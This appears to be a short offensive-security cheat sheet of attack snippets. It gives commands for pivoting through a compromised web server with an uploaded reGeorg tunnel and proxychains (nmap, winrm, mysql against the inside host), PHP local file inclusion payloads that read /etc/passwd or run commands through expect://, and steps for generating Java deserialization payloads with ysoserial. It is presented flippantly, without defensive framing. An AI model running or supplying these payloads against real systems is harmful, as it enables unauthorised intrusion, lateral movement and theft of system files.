What’s here ?

• Every kind of snippets/attacks. :smile:

General

Use a web host as a pivot point.

• Clone the repo
• Upload the tunnel to the webserver (Your problem how it’s done :joy:)

python reGeorgSocksProxy.py -p 9050 -u http://victim_ip/tunnel.php

Now you’ll get a nice proxy through the uploaded tunnel (port 9050 its the default for proxychains, check /etc/proxychains.conf for more info), Now you can explore the host from inside, or make funny things.

proxychains nmap -sT victim_ip
proxychains ruby winrm.rb # If winrm its only available from inside.
proxychains mysql -h localhost ...

php vary

http://127.0.0.1/fileincl/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd
http://127.0.0.1/fileincl/example1.php?page=expect://ls

Java object deserialization

Depending on the web-app, implementation, this could’be a nice vector.

• Clone the repo
• View the payload list: java -jar ysoserial.jar
• Generate the payload: java -jar ysoserial.jar payload "ping 10.10.10.10"